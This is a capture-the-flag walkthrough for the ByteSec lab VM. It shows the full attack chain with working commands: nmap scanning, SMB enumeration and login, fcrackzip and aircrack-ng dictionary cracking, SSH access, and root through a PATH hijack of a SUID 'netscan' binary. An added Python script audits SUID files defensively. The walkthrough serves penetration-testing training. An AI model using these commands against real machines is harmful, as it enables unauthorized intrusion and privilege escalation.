Flags: 2 (first user, second root). Learning: exploit, SMB, Enumeration, Steganography, Privilege Escalation. We recommend that you use VirtualBox and not VMware for this VM.
URL: OS ByteSec
Author: Rahul Gehlaut
Set up the machine with a host-only adapter and run netdiscover to find its IP address. My interface eth1 is host-only on my main OS (Kali Linux).
netdiscover -i eth1
We can identify the machine at IP 192.168.56.116, so we scan it for open ports with nmap, saving the output to a file named "nmap" with the following command:
nmap -sS -p- -A -oN nmap 192.168.56.116
We have identified that ports 80, 139, 445 and 2525 are open. Ports 139 and 445 are worth noting as they are likely SMB. Read more about Samba shares here
To start, port 80 is open so we will investigate this port with a browser.
At first glance, the bottom of the web page has the following text:
This is also seen in the page source:
This gives us a pretty obvious hint that Samba is probably running. Let’s perform some enumeration based on this information with enum4linux, a tool for enumerating information from Windows and Samba systems.
Known Usernames = administrator, guest, krbtgt, domain admins, root, bin, none.
Let’s try to log into SMB with smbclient. This tool launches an FTP-like client to access SMB/CIFS resources on servers (computerhope).
Execute the following command:
smbclient //192.168.56.116/smb -U smb -p
To break this command down, we specify the share as //host/smb, the user with -U smb, and -p enables a printer service rather than a normal filespace service.
We are logged in. There are two files, safe.zip and main.txt, which we transfer to our local system with “get”:
ls
get safe.zip
get main.txt
There doesn’t seem to be anything in main.txt, so let’s have a look at the archive:
The .zip file is password protected. There is a tool we can use to try to crack the password by brute force.
fcrackzip is a zip file password cracker.
fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u safe.zip
To break down this command, -D specifies a dictionary attack, -p specifies the rockyou.txt dictionary and -u specifies the file we want to crack. The command essentially tries to decompress the zip archive using the passwords in the wordlist and returns the password when successful.
A password has been found:
PASSWORD FOUND!!!!: pw == hacker1
Unzipping the file with the password gives us a .cap file. A .cap file is a packet capture that can be analysed with traffic analysis software such as Wireshark. To read more about this, Lifewire has a pretty good article. Let’s open the file with Wireshark.
Looking at the .cap file, we see the 802.11 protocol in use. This Wireshark page explains the protocol seen in this traffic capture: Wireshark
After some research, we can identify WLAN as IEEE 802.11, so these could be packets captured over WiFi. When analysing WiFi traffic, one can often find a 3-way handshake whenever someone joins the network. We can try to crack this .cap file for any passwords.
Let’s use aircrack-ng, a tool which assesses WiFi network security. Run the following command:
aircrack-ng user.cap -w /usr/share/wordlists/rockyou.txt
Aircrack has found a password:
KEY FOUND! [ snowflake ]
There is a username that can easily be seen in the packet capture:
Now that we have a username and password, let’s try logging in with SSH. If you remember, SSH was open on a non-standard port:
cat nmap | grep ssh
SSH on port 2525.
ssh <username>@192.168.56.116 -p 2525
Let’s upgrade our shell with the following command:
python -c 'import pty;pty.spawn("/bin/bash")'
There are a few home directories, for the users sagar, smb and blackjax:
This next section focuses on exploiting Set User ID (SUID). This is a good article if you want to read more:
And another website on privilege escalation with a section on SUID:
The following command identifies any SUID-enabled executables owned by root on the machine:
find / -user root -perm -4000 -print 2>/dev/null
For reference, these binaries are native to Linux, meaning we should not investigate any of them:
ping, ping6, passwd, sudo, chfn, arping, gpasswd, chsh, mount, su, umount, newgrp, pppd
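As an added example (not from the original walkthrough), a small Python audit that reproduces the filter of the find command above and then drops the native binaries from the list, leaving only the custom SUID-root files an administrator should review. The directory and file names created in demo() are constructed for the demonstration.

```python
import os
import stat
import tempfile

# Allowlist of SUID binaries the walkthrough treats as native to a stock
# Linux install; any SUID-root file outside this set deserves a closer look.
NATIVE_SUID = {
    "ping", "ping6", "passwd", "sudo", "chfn", "arping", "gpasswd", "chsh",
    "mount", "su", "umount", "newgrp", "pppd",
}

def find_suid(root="/", owner_uid=0):
    """Return regular files under `root` owned by `owner_uid` that carry the
    setuid bit: the same set `find / -user root -perm -4000` lists."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # unreadable entries are skipped, like 2>/dev/null
            if (stat.S_ISREG(st.st_mode) and st.st_uid == owner_uid
                    and st.st_mode & stat.S_ISUID):
                hits.append(path)
    return sorted(hits)

def suspicious_suid(paths, allowlist=NATIVE_SUID):
    """Keep only binaries whose basename is not on the native allowlist."""
    return [p for p in paths if os.path.basename(p) not in allowlist]

def demo():
    # Constructed sample: a throwaway directory holding one 'native' and one
    # custom setuid file, owned by the current user so the check runs unprivileged.
    d = tempfile.mkdtemp()
    for name in ("passwd", "netscan"):
        p = os.path.join(d, name)
        with open(p, "w") as f:
            f.write("#!/bin/sh\n")
        os.chmod(p, 0o4755)  # rwsr-xr-x
    found = find_suid(d, owner_uid=os.getuid())
    return [os.path.basename(p) for p in suspicious_suid(found)]

if __name__ == "__main__":
    print(demo())  # ['netscan']
```

Run it against "/" with owner_uid=0 on a real host to get the reviewable list; a custom setuid binary such as netscan is exactly what shows up.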
One of the binaries identified by the command:
This is evidently not native, so let’s have a closer look. Run the binary with the following command:
Let’s exploit this with the following commands:
cd /tmp
echo "/bin/bash" > netstat
chmod 777 netstat
export PATH=/tmp:$PATH
/usr/bin/netscan
These commands create a file called netstat in /tmp with the right permissions. The export command marks the modified PATH to be passed to child processes, with /tmp searched first. Then the netscan binary is run again.
And we are root, with root flag: